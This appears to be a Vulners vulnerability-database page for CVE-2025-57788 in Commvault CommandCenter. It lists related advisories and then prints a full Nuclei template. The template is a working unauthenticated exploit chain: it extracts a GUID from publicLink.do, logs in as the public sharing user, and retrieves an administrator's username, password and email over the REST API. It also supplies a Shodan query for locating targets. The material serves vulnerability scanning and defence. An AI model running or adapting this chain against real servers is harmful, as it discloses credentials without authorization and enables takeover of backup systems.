| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2025-57788 | 20 Aug 202506:48 | – | circl | |
| Commvault 安全漏洞 | 20 Aug 202500:00 | – | cnnvd | |
| Commvault 11.32.x < 11.32.102 / 11.36.x < 11.36.60 Multiple Vulnerabilities (CV_2025_08_1-4) | 22 Aug 202500:00 | – | nessus | |
| Commvault CommandCenter < 11.36.60 Unauthorized API Access | 8 Jan 202600:00 | – | nessus | |
| CVE-2025-57788 | 20 Aug 202500:00 | – | cve | |
| CVE-2025-57788 Unauthorized API Access Risk | 20 Aug 202500:00 | – | cvelist | |
| EUVD-2025-25258 | 20 Aug 202500:00 | – | euvd | |
| Commvault Command-Line Argument Injection to Traversal Remote Code Execution | 17 Sep 202518:53 | – | metasploit | |
| Vulnerabilities fixed in Commvault | 20 Aug 202512:15 | – | ncsc | |
| CVE-2025-57788 | 20 Aug 202504:16 | – | nvd |
id: CVE-2025-57788
info:
name: Commvault Unauthenticated Password Disclosure (WT-2025-0047)
author: DhiyaneshDK,iamnoooob,pdresearch,watchtowr
severity: medium
description: |
An issue was discovered in Commvault before 11.36.60. A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials. RBAC helps limit the exposure but does not eliminate risk.
impact: |
Unauthenticated attackers can exploit the public sharing login mechanism to access API endpoints and retrieve sensitive user information including passwords.
remediation: |
Upgrade Commvault to version 11.36.60 or later that properly restricts API access and removes the vulnerable login mechanism.
reference:
- https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
- https://documentation.commvault.com/securityadvisories/CV_2025_08_3.html
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-542502280
tags: cve,cve2025,commandcenter,commvault,unauth,vkev,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /commandcenter/publicLink.do HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: guid
group: 1
regex:
- 'cv-gorkha\\":\\"(.*?)\\"'
internal: true
matchers:
- type: word
part: body
words:
- 'cv-gorkha'
internal: true
- raw:
- |
POST /commandcenter/api/Login HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: application/json;charset=UTF-8
{
"username": "_+_PublicSharingUser_",
"password": "{{base64(guid)}}"
}
matchers:
- type: word
part: body
words:
- '_+_PublicSharingUser_'
- 'Public Sharing User'
- 'token'
condition: and
internal: true
extractors:
- type: regex
part: body
name: token
group: 1
regex:
- '"token":"(.*?)"'
internal: true
- raw:
- |
GET /commandcenter/RestServlet/Database/GetUmUserById/1 HTTP/1.1
Host: {{Hostname}}
Accept: application/xml
Authtoken: {{token}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, 'login','email','password','datePasswordSet')
condition: and
extractors:
- type: json
part: body
name: password
json:
- ".password?"
internal: true
- type: json
part: body
name: username
json:
- ".login?"
internal: true
- type: json
part: body
name: email
json:
- ".email?"
internal: true
- type: dsl
dsl:
- '"username: " + username + " password:" + password + " email: " + email'
# digest: 4a0a00473045022007cfdbc4b3651d3f134cd65aafad58ab0b4d7c282dbd203b3827c21f2253db8f02210081da3f84706b276884f1312a7a9bc20994619993347bb65888b139f6373eb9f9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation